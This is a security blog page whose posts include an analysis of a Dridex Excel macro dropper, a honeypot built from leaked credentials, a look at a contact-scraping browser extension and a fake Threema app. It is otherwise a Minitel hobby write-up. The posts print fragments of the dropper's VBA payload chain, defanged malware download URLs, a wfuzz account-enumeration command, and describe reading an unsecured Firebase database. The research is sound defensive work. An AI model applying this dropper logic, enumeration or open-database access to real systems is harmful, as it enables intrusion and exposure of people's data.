Thursday, July 29, 2021

Analyzing an Excel Dridex Dropper

Summer 2021 has been rather rainy 🌧 so far... what better pastime than analyzing some malware? As an example, we'll use the maldoc sample 80fa4862d3d5ffe4a9d472f42e03a59874e76257c6e25c74de83b236f8f99777, which is available for download from MalwareBazaar.

This maldoc sample is an .xlsm file, an Excel file based on the Office Open XML (OOXML) format introduced with Microsoft Office 2007. The trailing m denotes that the file includes macros, which in this case contain the malicious code. Since macros are disabled by default for documents from untrusted sources, the document displays a notice asking the viewer to enable them – a common social engineering technique that allows the malicious code to execute on the system.
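Since the OOXML container is just a ZIP archive, the presence of a macro project can be confirmed without opening Excel by looking for the xl/vbaProject.bin part. A minimal sketch using Python's zipfile module (the archive built below is synthetic, for illustration only; a real .xlsm would be read from disk):

```python
import io
import zipfile

def has_vba_project(data: bytes) -> bool:
    """True if the OOXML container (a ZIP archive) carries a VBA macro part."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return any(name.endswith("vbaProject.bin") for name in z.namelist())

# Synthetic .xlsm-like container for demonstration purposes:
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr("[Content_Types].xml", "<Types/>")
    z.writestr("xl/vbaProject.bin", b"\x00")

print(has_vba_project(buf.getvalue()))  # → True
```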

Let's inspect the contents of the macros using Philippe Lagadec's olevba:

We can see that the document contains a rather short VBA macro. It consists of a single subroutine called Workbook_Open(), which is executed when the file is opened (or as soon as macros are enabled). As an obfuscation strategy, the code references many cells in the current worksheet. The values of these cells are assigned to a number of misleadingly named variables, which are then concatenated to produce a payload.

In order to inspect the worksheet cells, I uploaded the document to Google Docs. The lower part of the worksheet contains a large region of decimal numbers, and strings like "mshta" or "Wscript.Shell" appear in cells scattered across the document, all of them off-screen so that they aren't apparent at first sight.

 

Let's now dive into the VBA code. The first line refers to an environment variable and appends a string to it:
 
getTickLabelPositionNextToAxis9686 = Environ(Cells(170, 211)) & Cells(51, 76)
 
We can retrieve the value %ALLUSERSPROFILE% and the string \getAreaStacked1005705.sct from the corresponding cells HC170 and BX51, resulting in the file path C:\ProgramData\getAreaStacked1005705.sct being stored in the variable getTickLabelPositionNextToAxis9686:
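Translating VBA's numeric Cells(row, column) references to A1 notation makes it much easier to locate them in the sheet. A small helper I find handy for this (column letters follow the usual base-26 scheme):

```python
def a1(row: int, col: int) -> str:
    """Convert 1-based (row, column) indices to A1 notation, e.g. (170, 211) -> HC170."""
    letters = ""
    while col:
        col, rem = divmod(col - 1, 26)
        letters = chr(ord("A") + rem) + letters
    return f"{letters}{row}"

print(a1(170, 211), a1(51, 76))  # → HC170 BX51
```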


Next, the worksheet Sheet1 is accessed (cell HI62) and the range B158:BP338 is selected from it (taken from cell HY70).

For Each getDColumnClustered1919 In ActiveWorkbook.Sheets(CStr(Cells(62, 217))).Range(CStr(Cells(70, 233)))
  getExcel97959228 = getExcel97959228 & Chr(Round(getDColumnClustered1919.Value))
Next getDColumnClustered1919

From this code we can see that each value in the range B158:BP338 encodes an ASCII character: rounding the cell value yields the character code. It was pretty straightforward to reproduce this decoding routine in Google Docs using Apps Script. The result is a payload of type HTML Application (HTA), which can itself execute embedded code, as we will see later.
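The decoding loop is easy to reproduce outside of Excel as well. A Python sketch mirroring the VBA routine (the sample values are illustrative, not the actual worksheet contents):

```python
def decode_cells(values):
    """Mirror of the VBA loop: round each cell value and map it to its ASCII character."""
    return "".join(chr(round(v)) for v in values)

# Illustrative values only; the real range B158:BP338 yields the HTA payload.
print(decode_cells([60.2, 103.8, 116.1, 109.4, 107.6, 62.3]))  # → <html>
```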

Next, the HTA payload will be stored on disk using the path determined before (C:\ProgramData\getAreaStacked1005705.sct):

Open getTickLabelPositionNextToAxis9686 For Output As #1
Print #1, getExcel97959228
Close #1

Finally, the HTA payload is invoked through an instance of Wscript.Shell (the ProgID taken from cell BI156) and its Exec method:


With CreateObject(Cells(156, 61))
    .Exec Cells(64, 233) & getTickLabelPositionNextToAxis9686
End With

This in turn spawns an mshta.exe process to interpret and execute the HTA file, as can be seen in this execution of the malware on app.any.run:

The HTA file contains a VBScript element from which we can extract a list of download URLs for the second stage:
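Extracting such URLs from the VBScript body is straightforward with a regular expression over the defanged text. A sketch (the embedded snippet is a shortened, illustrative excerpt; the full list appears under Indicators below):

```python
import re

# Shortened, illustrative excerpt of the HTA's VBScript URL array:
hta_snippet = '''
urls = Array("hxxp://docusignupdates[.]com:8088/files/icon_psn98.png", _
             "hxxp://azuredocs[.]org:8088/css/avatar_xgaf8d.png")
'''

# Match defanged http(s) URLs up to the closing quote or whitespace:
urls = re.findall(r'hxxps?://[^"\s]+', hta_snippet)
print(urls)
```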

It uses an MSXML2.ServerXMLHTTP.6.0 instance with a user-agent value of "qPowerTalk" to download a DLL payload to C:\ProgramData\qMillions.dll (688bc9341860e2f04f307f162f71a628896bc6ca9fa200be54eee05a4b69cb72). The payload is then executed using rundll32.exe with entry point D2D1CreateFactory.


As we can see, this second stage sample has been classified as Dridex by several vendors:


Indicators

Files:
  • 80fa4862d3d5ffe4a9d472f42e03a59874e76257c6e25c74de83b236f8f99777 (maldoc)
  • 688bc9341860e2f04f307f162f71a628896bc6ca9fa200be54eee05a4b69cb72 (stage2)

Download URLs:

  • hxxp://docusignupdates[.]com:8088/files/icon_psn98.png
  • hxxp://azuredocs[.]org:8088/css/avatar_xgaf8d.png
  • hxxp://documentupdates[.]com:8088/templates/bacground_k8gad.png
  • hxxp://azuredocs[.]org:8088/javascript/empty_jquz.png
  • hxxp://mydocumentscloud[.]com:8088/app/button_umlnxz.png
  • hxxp://mydocumentscloud[.]xyz:8088/files/icon_psn98.png
  • hxxp://azuredocs[.]org:8088/js/empty_lfqcu.png
  • hxxp://mydocumentscloud[.]xyz:8088/uploads/empty_mtti.png
  • hxxp://docusignupdates[.]com:8088/javascript/bacground_ma8wvc.png
  • hxxp://docusignupdates[.]com:8088/uploads/icon_psn98.png

Sandbox runs:


Tuesday, April 6, 2021

Pwned in 604'800 seconds

Have you ever wondered if your internet accounts were hacked? One way to find out is checking your e-mail address on Troy Hunt's "Have I Been Pwned" website. Troy has been collecting leaked passwords from dozens of breached sites for over a decade. Was your e-mail address involved in a breach and was your password exposed? Then that password is burnt. You need to change it immediately and never use it again. Is this being paranoid? Let's figure out how long it would take for someone to actually hack it.

The idea is to set up a honey account on a popular platform, signing up with a known leaked e-mail and password combination. First, we'll need access to one of the leaked password dumps, which is not very hard to come by...

Exploit.In

In late 2016, a huge list of email address and password pairs appeared in a "combo list" referred to as "Exploit.In". The list contained 593 million unique email addresses, many with multiple different passwords hacked from various online systems. The list was broadly circulated and used for "credential stuffing", that is, attackers employ it in an attempt to identify other online systems where the account owner had reused their password.

Next we'll need to select one or several abandoned e-mail addresses. For this I decided to focus on the gmx.net FreeMail service, since it is rather convenient to check the availability of addresses.

Then let's retrieve all @gmx.ch addresses from the password dump:

grep -rhi '@gmx.ch:' Exploit.in | awk -F: '{print $1}' > gmx.txt
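The same extraction works offline in a few lines of Python, for readers who prefer it over the shell pipeline (the combo lines below are made up for illustration):

```python
# "email:password" combo lines, as found in such dumps (illustrative sample):
lines = [
    "alice@gmx.ch:hunter2",
    "bob@example.com:letmein",
    "carol@gmx.ch:tr0ub4dor",
]

# Keep the address part of every gmx.ch line, like the grep + awk pipeline:
candidates = [line.split(":", 1)[0] for line in lines if "@gmx.ch:" in line.lower()]
print(candidates)  # → ['alice@gmx.ch', 'carol@gmx.ch']
```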

There are roughly 140k candidates. I used wfuzz to automate the availability check:

wfuzz -w gmx.txt -H "Authorization: Bearer qXeyJ..." -H "Content-Type: application/json" -H "X-CCGUID: e58d..." -H "User-Agent: hello" -u https://onereg-email-suggest.gmx.net/email-alias/availability -d '{"emailAddress": "FUZZ", "countryCode": "CH", "requestedEmailAddressProduct":"gmxnetFree"}' -s 2 -f results.txt --ss true

This endpoint is rate-limited, so it is necessary to throttle the requests (using -s 2). Nonetheless, this quickly provided a set of candidates.

Now let's register some accounts. I decided to opt for popular platforms, like Instagram, eBay, etc., using the breached credentials. Now that the honeypots are set up, let's wait...

Within a week, someone identified the breached credentials on Instagram, logged into the honey account and started doing weird stuff, e.g. changing the profile and adding lots of followers, essentially turning the account into a bot.


Here are some takeaways:

  1. Use unique passwords for each and every account.
  2. You can't memorize so many passwords? Use a password manager.
  3. If possible, set up multi-factor authentication (MFA).
  4. Subscribe to HIBP's breach notifications.


Thursday, February 6, 2020

Down the Rabbit Hole of Harvested Personal Data

In this blog post I will shine a light on dubious business practices around the trading of personal data. I describe by which technical means personal data is harvested in the first place, and how it is sold via intermediaries later on. Based on a recent experience with leaked personal data, I will track down my own mobile phone number.

The story began when I received a contact request from a recruiter via the WhatsApp messenger. I was anything but happy about this aggressive tactic, to say the least. Therefore I decided to contact the Swiss-based recruiting company (digitalent.ch) and ask them to inform me about their data source. Their CEO replied within hours and let me know that my number was acquired «from a publicly available directory called lusha.co».

lusha.co – the data scrapers

lusha.co is based in Tel Aviv and was founded in 2016. Quoting their website, they «collect information concerning business profiles, including […] name, company name, job title, email address, phone numbers, business address, and social media links», which of course are sold for access. Unfortunately, only vague information is provided on their data sources: «Lusha collects information from publicly available sources and from its business partners which take part in building and improving the Lusha community.» We will soon see that the term publicly available sources is open to interpretation and that the contribution of their business partners is key to their success. As a company aggressively aspiring to grow (I counted 7 sales/marketing employees versus 4 engineers), they are constrained by data protection laws such as the GDPR and the CCPA in the European and American markets respectively. They offer a contact for European citizens to exercise their rights under the GDPR. I am not a lawyer, but the phrasing sometimes sounds as if they weigh their own interests well above the regulations, e.g. «[…] please note that these rights are not absolute, and may be subject to our own legitimate interests and regulatory requirements» and «Lusha’s lawful basis for processing is its legitimate interest in providing its services to its users» ¯\_(ツ)_/¯

Anyhow, let's get to the inner workings of lusha.co. A free subscription is available with an offer of 5 credits per month, each credit allowing the retrieval of one requested person's data. As a user, you are supposed to use a browser extension that integrates with LinkedIn when accessing user profiles on the platform. The extension is available for Chrome, Edge and Firefox; note that the extension is not recommended by Firefox.


For the dynamic analysis, I installed the Firefox extension directly from the Add-ons website. For a static analysis, there are two options: download the .xpi file (right-click on the blue "+ Add to Firefox" button and select "Save as...") or retrieve it from the user profile folder (on a Mac: /Users/<username>/Library/Application Support/Firefox/Profiles/<profile>/extensions/<filename>.xpi).

File name: lusha_easily_find_b2b_contact_details-9.5.1-an+fx.xpi
SHA-256: 11e48be153a28adda35514e959844098f41d5606628c454efbcb7a5c683acab5

The .xpi file is just a ZIP archive containing the different HTML and JavaScript artefacts used by the extension. The file manifest.json contains the permissions and the URLs for content scripts. This is the code that will be injected into pages when visiting the corresponding URLs, in this case LinkedIn and Salesforce.

{
  "manifest_version": 2,
  "short_name": "Lusha",
  "author": "Lusha",
  "description": "Lusha is the easiest way to find B2B contact information with just one click.",
  "version": "9.5.1",
  "name": "Lusha - Easily find B2B contact information",
  "content_scripts": [
    {
      "matches": [
        "https://dashboard.lusha.co/*",
        "https://*.linkedin.com/*",
        "https://*.salesforce.com/*"
      ],
      "exclude_matches": [
        "https://www.lusha.co/*",
        "https://www.salesforce.com/*",
        "https://*.lightning.force.com/*"
      ],
      "js": [
        "content.js",
        "assets.js"
      ],
      "run_at": "document_idle"
    }
  ],
  "permissions": [
    "tabs",
    "https://*.lusha.co/*",
    "storage"
  ],
  "optional_permissions": [
    "https://*.lightning.force.com/*"
  ]
  ...
}
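Given the match patterns above, we can check which URLs would receive the content scripts. A simplified sketch using shell-style globbing (real WebExtension match patterns have stricter semantics, so this is only an approximation):

```python
import fnmatch

# Patterns copied from the manifest's content_scripts section:
MATCHES = [
    "https://dashboard.lusha.co/*",
    "https://*.linkedin.com/*",
    "https://*.salesforce.com/*",
]

def is_injected(url: str) -> bool:
    """Approximate test: would the content scripts be injected into this URL?"""
    return any(fnmatch.fnmatch(url, pattern) for pattern in MATCHES)

print(is_injected("https://ch.linkedin.com/in/antoineneuenschwander"))  # → True
print(is_injected("https://example.com/"))                              # → False
```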

Being logged on to LinkedIn, I visited my own profile to see if and what data lusha.co would provide:


An HTTP network trace using Burp Suite shows interesting behaviour: the entire HTML body of the visited page is sent to lusha.co's backend servers as an LZ-compressed, base64-encoded payload in the "html" value, with a total of 18 kB (HTTP headers and payload truncated for better readability):


POST /v2/search HTTP/1.1
Host: plugin-services.lusha.co


{"html":"PGRpdiBjbGFzcz0iZ2xvYmFsLWFsZXJ0IMwNLS15aWVsZM8UaXNFeHBhbmRlZCIgZGF0YS1
pZD0iY29va2llLXBvbGljeSI+PGxpLWljb27UY19fxRrSE8hvb25sb2FkIGxhenktxAplZCI+PC/HUj4
8cNZVbWVzc2FnZS1jb250ZW50Ij5UaGlzIHdlYnNpdGUgdXNlcyDmAKVzIHRvIGltcHJvdmUgc2Vydml
jZSBhbmQgxBJpZGUgdGFpbG9yZWQgYWRzLiBCeSB1c2luZyB0xFDETSwgeW91IGFncmVlxEvFGHVzZS4
gU2VlIG91ciA8YSBocmVmPSJodHRwczovL3d3dy5saW5rZWRpbi5jb20vbGVnYWwv7QE1P3Ryaz1wdWJ
saWNfcHJvZmlsZV/GIV/GIV9jbGlja+cBdHRyYWNraW5n5QDvcm9sLW5hbWU9It9A00B3aWzEPXZpZ2F
0ZT0iIj5DxTQgUMU0PC9hPi48L3A+PGJ1dHRvbiB0eXBlPSLGDSL2AYnIHf8AqOwAqGRpc21pc3MiIGF
yaWEtbGFiZWw9IkTHFf8CTcQaLS3HQvQCPMZVaGlkZGVuPSJ0cnVl7QJPL+YAsD48L2Rpdj48aGVhZGV
yyGvGDiI+PG5h6QMvbmF2Ij7pAeMv9AG4bmF2LcY7LWxvZ2/pASluYXZfX8QSLeQCDv8BI99T/wHHPHN
wYekBMsp4dGV4dCI+TOUCjEluPC/EJvEBYckv/wFI7gFIYT48c2VjdGnKSHNlYXJjaC1iYXLnAK9jdXJ
yZW50LccZ5gJNUEVPUExFIukCY9E9X19wbGFjZWhvbOQBmnNob3ctb24tbW9iaWxlIGhpZGXED2Rlc2t
0b3D/AVTuAVTHY3N3aXRjaGVyLW9wZW5lcu4ChuYE7CDGKyI+7AU47ACiZnVsbC3rAKciPkFudG9pbmU
gTmV1ZW5zY2h35AUzcucCZukCdcxP6ACHdGFic19fdHJpZ2dlci1hbmTFEvIBIc4wy33pARXmAST/ART
vARTMVu4A0u0CU9p+5wJkUGVvcGxl9wJizz5jYXJldC1kb3duLWZpbGxl/wYE/wFAxFTwAhjwARM+PGg
...
A6BCWzxbpCs9NRkFIU2xTVllETmZ0akRFanlNZmFLVnV6YmpZQ3hITOgA5M9XzQ1B5AcPb3Bl5gsq7wC
95Q2e7gNm6Qe1xQY=","url":"https://ch.linkedin.com/in/antoineneuenschwander","req
uest_id":"74924a15-ef0c-4bed-97a9-498831865d47","firstSearch":true}


By decompressing the payload, we can see that the contents include data that is only visible to logged-in users:


$ node
Welcome to Node.js v13.7.0.
Type ".help" for more information.
> var LZUTF8 = require('lzutf8');
undefined
> var compressed = fs.readFileSync('html_payload_compressed.bin', 'utf8')
undefined
> LZUTF8.decompress(compressed, {inputEncoding: "Base64"});
...
' <div class="artdeco-hoverable-content__content artdeco-hovercard-content-container">\n' +
' <p>See and edit how you look to people who are not signed in, and find you through search engines (ex: Google, Bing).</p>\n' +
'\n' +
...


In a second request, we get access to the "enriched" data corresponding to the displayed LinkedIn profile:


POST /v2/show HTTP/1.1
Host: plugin-services.lusha.co

{"request_id":"74924a15-ef0c-4bed-97a9-498831865d47"}


HTTP/1.1 201 Created
Date: Tue, 04 Feb 2020 20:59:39 GMT
Content-Type: application/json; charset=utf-8
Connection: close

{"request":{"phones":["+41 7X XXX XX XX","+41 5X XXX XX
XX"],"emails":[],"name":"Antoine
Neuenschwander","link":"https://ch.linkedin.com/in/antoineneuenschwander","platf
orm":"linkedin","contact":{"id":"42127f80-4791-11ea-a6c7-4fac905d8f3e","firstNam
e":"Antoine","lastName":"Neuenschwander","showDate":"2020-02-04T20:59:39.256Z","
lists":"all contacts"},"company":{"address":"Worblaufen, Bern,
Switzerland","categories":["Information
Technology","Telecommunications"],"description":"Swisscom, Switzerland’s
leading telecoms company and one of its leading IT companies, is headquartered
in
Ittigen.","domain":"swisscom.ch","employees":"+10,000","founded":"1998","logo":"
https://logo.lusha.co/a/4f4/4f479b5d-343e-49c2-822c-edd920333dd0.jpg","name":"Sw
isscom","social":{"facebook":{"url":"https://www.facebook.com/Swisscom"},"linked
in":{"url":"https://www.linkedin.com/company-beta/2715"},"twitter":{"url":"https
://twitter.com/swisscom_de"}},"website":"swisscom.ch"}},"user":{"email":"XXXXX",
"isOnBoarding":true},"trialExpired":false}


The lusha.co browser extension states the following regarding the type of data submitted to their backend and required to identify a user profile:


From my observations, not only «certain words (such as full name and company name)» but the entire user profile data is sent to lusha.co's servers. Also, the data is not only sent when needed, i.e. when a user requests enriched data of a single, chosen LinkedIn profile, but for each and every visited profile. This extension thus essentially implements a crawler that scrapes every single LinkedIn profile in private view as users browse LinkedIn – which is actually a clear violation of LinkedIn's terms. So they are basically selling the data back to the very customers who harvest it in the first place, brilliant!


Meanwhile, I contacted lusha.co for a GDPR request, to which they replied:
In order to process your request we need to identify your profile,
for that purpose the following information is needed:
First Name:
Last Name:
Company Name:
Nationality:
Public LinkedIn profile link:
Needless to say, this procedure is insufficient to properly identify a legitimate requestor. I am tempted to try and impersonate another person, but I will abstain from doing so. As a result of my request, lusha.co provided me with both my phone numbers, matching my own earlier lookup. They also mentioned the data origin: «The information above originates from a database maintained by Simpler Apps Inc ("Simpler").»

Interesting! From its description, Simpler is an app that replaces the standard dialing and contacts functions on Android smartphones. And unsurprisingly, the app requires access to the user's contacts as well as full network access. Now, what could have happened? I assume that my mobile phone numbers were harvested from an installation of this app by someone who must have had me in their contacts. Perhaps I will investigate the Simpler app in a subsequent blog post...


edit - 20.02.2020: Nightwatch Cybersecurity wrote a follow-up blog post on the matter analysing the role of the Simpler app.


Thursday, January 23, 2020

Analysis of a Fake Threema App

A couple of days ago there were reports of an app on the Google Playstore, which seemed to impersonate the Threema messenger app. Threema is a Swiss secure messaging service that uses end-to-end encryption to provide privacy to their users.



In the past, several fake apps have already been observed targeting Swiss brands, e.g. Bluewin. In that case, the app's purpose was to steal credentials (login/password) from users who inadvertently downloaded it from the wrong developer. A more detailed description of the modus operandi can be found in a blog post by SWITCH-CERT.




Unfortunately, I failed to take a screenshot of the app while it was still available on the Playstore, before it was taken down by Google. But I remember that the download counter had already reached 100+. Currently the app can still be downloaded from alternative sites such as apkpure.com, which mirror all available apps from the Google Playstore. Each app in the Google Playstore is identified by a string in the form of a reverse domain name, in this case: com.wa.threema.



From the app description, we can see that it was first published on January 9th, 2020, meaning the app was available for more than ten days before it was reported to the Google abuse team and eventually removed.



So I went ahead and downloaded the APK file for analysis. First, I launched the emulator provided with the Android Studio development environment, dragged the APK into the virtual device and launched it. Meanwhile, I also started Burp Suite and changed the proxy settings of the emulator in order to intercept the network traffic. Unfortunately, this didn't work as expected because most network communication was destined for Google domains and protected by certificate pinning in the app. Therefore, I didn't follow up on the dynamic analysis, although it did allow me to take a couple of screenshots and better understand the application logic:




I then used the JADX decompiler to open the APK file and recover its source code and other resources. The first step is to analyse AndroidManifest.xml, which contains a listing of the relevant activities, especially the one that is called at app startup: ar.codeslu.plax.MainActivity.




Looking at the code, we can see that the app makes use of Google's Firebase services, especially its NoSQL database component, and we can already see what kind of entities are persisted on the backend: Global.USERS, Global.CHATS, Global.GROUPS and Global.CALLS. Also, an encryption object is created and initialized with Global.keyE and Global.salt, which are actually hardcoded values found in the ar.codeslu.plax.global.Global class (funny, but irrelevant for the rest of the analysis):


A glimpse at the string resources gives us information about the URLs used to connect to the Firebase database backend:


Thanks to Elliot Alderson's blog post on hacking the Donald Daters app, I learned how to access the insecure Firebase backend associated with the app, which of course contained all user, chat, group and call records, as defined in the MainActivity class. At the time of writing, the database contained 286 registered users, 15 chats and 8 calls.
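For reference, the technique boils down to Firebase's REST interface: an unsecured Realtime Database answers unauthenticated reads when .json is appended to a node path. A sketch of building such a request URL (the project URL is a placeholder, not the actual backend of the analyzed app):

```python
# Placeholder base URL; a real analysis would use the URL found in the
# app's string resources.
BASE = "https://example-project.firebaseio.com"

def rest_url(path: str) -> str:
    """REST read endpoint for a Realtime Database node: append '.json' to the path."""
    return f"{BASE}/{path.strip('/')}.json"

print(rest_url("Users"))  # → https://example-project.firebaseio.com/Users.json
# Fetching that URL (e.g. with curl or urllib) returns the entire node as JSON
# whenever the database rules allow public reads.
```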



Looking at the code, we can see that the app actually implements all the functionality of a working messaging service, including audio and video calls. That's quite a lot of effort if the app's only intention is phishing. Indeed, my assumption was that the app was attacking Threema's registration process, but I couldn't find evidence to back this claim. So what is this app intended for?

Based on the package name ar.codeslu.plax I figured that a similar app was being sold on a marketplace. And by that I mean you can actually buy the source code of the app for as little as 35 USD and customize it to offer your own chat app on the Google Playstore:



It turns out you can even find free downloads of the code by googling a bit:


There's also a more expensive license that allows the buyer to charge their users, and I assume that's the actual business model behind the fake app:


Looking for other apps by the same developer (junemoney, saadmslout@gmail.com), we see almost a dozen other chat apps that were all released at approximately the same time and that impersonate other popular messaging services like Discord, TextNow or Zalo, for which the developer has even written a corresponding privacy policy (I guess that's mandatory if you want to publish apps on the Playstore).



So in conclusion, from my point of view, the fake app's intention is not to steal user credentials, but rather to trick people into downloading the wrong app and have them pay subscriptions for its usage. (Other ideas? Leave me a comment.)

Anyhow, such apps often slip through the Google Playstore's "quality assurance" during publication and are then made available to everyone for download :-/ But since such apps clearly violate Google's Developer Policies, anyone can report them as abusive: either because they are malicious, as in the case of the phishing app, or because they infringe the intellectual property rights of others. While logged into your Google account, you can go to the app's Playstore page, scroll down and report the app based on one of the two described violations.



Indicators of Compromise:
Filename: Threema Private Messenger_v1.4.2_apkpure.com.apk
SHA-256: a5422bc7f09c22a877f580119027ed83c6ba7ac12ae6647808b2ffddfcab7124

Wednesday, September 21, 2016

36 15 Framboise



As a boy visiting family in France, one of the things I was very excited about was the Minitel that everybody had at home. It was a very popular videotex network in the 80s and 90s, providing a multitude of services unbelievably similar to today's online experience. This compilation of ads and news reports gives a good feel of what the Minitel had to offer. Today, it is often considered a precursor of the world wide web.

So, to satisfy my nostalgic feelings, I bought a Minitel on eBay. Although the service was retired in 2012, there are still plenty of devices on sale, with prices ranging from 20€ for the most common models (e.g. Minitel 1B TELIC) to several hundred € for the earlier/rarer models. The device suffered some cracks in the shell during shipping, but fortunately it still works!

Although the service is discontinued, and even if you don't live in France, a Minitel can still be put to good use. The Minitel is a so-called dumb terminal: it accesses services running on distant systems via the telephone network, which is why it has an integrated modem. But it can also interface with local devices via a serial port available on the back. There are plenty of blog posts explaining how to do this, just google for "minitel linux terminal". Since I'm also fond of the Raspberry Pi, this is the mandatory I-hooked-a-Minitel-to-my-Raspberry-Pi blog post!



I won't delve into too many technical details about the serial port adaptation, since there are enough resources about it online, but let me describe the challenges I faced. First of all, the Minitel expects a male 5-pin DIN connector, not the usual DE-9 serial connector. They call it the "Prise Péri-Informatique". I used a conventional MIDI patch cable, cut it in half and resoldered the pins to match the Minitel TX and RX leads.



Also, since I didn't want to get my hands too dirty – although I should practice some more soldering – I used the bi-directional logic level converter from SparkFun to adapt the 3.3V TTL signal level of the Raspberry Pi to the 5-15V levels of the Minitel (and vice versa). There are many blog posts explaining how to implement this with a simple circuit using a couple of resistors and transistors.



I took some time to analyze the signal with an oscilloscope and interpret the serial protocol. When no characters are transmitted, the idle level is high. The asynchronous transmission starts with the start bit (low), continues with the 7-bit ASCII character value (least significant bit first, as usual for asynchronous serial) and an even parity bit, and finally ends with a stop bit (high). From the measurement we can see that a symbol is transmitted in 208 microseconds. The reciprocal of this value corresponds to the baud rate of 4800 bps. In this case, the transmitted character was a lowercase 'e' (0b1100101 or 0x65).
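The framing described above can be sketched in a few lines: at 4800 baud one bit lasts about 208 µs, and a character travels as start bit, seven data bits (least significant first, the standard for async serial), an even parity bit and a stop bit. A small Python model of one frame (my own sketch, not code from the Minitel):

```python
# One bit lasts 1/4800 s ≈ 208 µs, matching the oscilloscope measurement:
bit_time_us = 1_000_000 / 4800
print(round(bit_time_us))  # → 208

def frame(ch: str) -> list[int]:
    """7E1 frame for one character: start (0), 7 data bits LSB first, even parity, stop (1)."""
    code = ord(ch)
    data = [(code >> i) & 1 for i in range(7)]  # least significant bit first
    parity = sum(data) % 2                      # even parity: total number of 1s is even
    return [0] + data + [parity] + [1]

print(frame("e"))  # 'e' = 0x65 → [0, 1, 0, 1, 0, 0, 1, 1, 0, 1]
```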



Finally, the last challenge I encountered was the fact that Raspbian, the standard Debian-based Linux distro for the Raspberry Pi, switched to systemd. Most blog posts still refer to /etc/inittab to install the serial getty. Under systemd, it's a bit trickier. Here's my configuration under /etc/systemd/system/serial-getty@ttyAMA0.service:

# This file is part of systemd.
#
# systemd is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation; either version 2.1 of the License, or
# (at your option) any later version.

[Unit]
Description=Serial Getty on %I
Documentation=man:agetty(8) man:systemd-getty-generator(8)
Documentation=http://0pointer.de/blog/projects/serial-console.html
BindsTo=dev-%i.device
After=dev-%i.device systemd-user-sessions.service plymouth-quit-wait.service
After=rc-local.service

# If additional gettys are spawned during boot then we should make
# sure that this is synchronized before getty.target, even though
# getty.target didn't actually pull it in.
Before=getty.target
IgnoreOnIsolate=yes

[Service]
ExecStart=-/sbin/agetty -c ttyAMA0 4800 m1b-x80
Type=idle
Restart=always
UtmpIdentifier=%I
TTYPath=/dev/%I
TTYReset=yes
TTYVHangup=yes
KillMode=process
IgnoreSIGPIPE=no
SendSIGHUP=yes

[Install]
WantedBy=getty.target


I also used the Minitel 1B terminfo file by Alexandre Montaron and installed it as follows:

$ tic -o /etc/terminfo mntl.ti


Here's a screenshot of the working system showing the output of the top command:


10 years ago, I got hold of the "Spécification Techniques d'Utilisation du Minitel 1B" (STUM), a 200-page specification of the Minitel and its building blocks (modem, keyboard, screen, serial port) as well as the different modes of operation ("Standard Télétel" or "Standard Téléinformatique ASCII"). It has proven very helpful for understanding the inner workings of the device.



Finally, here are some links you might want to check out if you want to find out more about Minitel: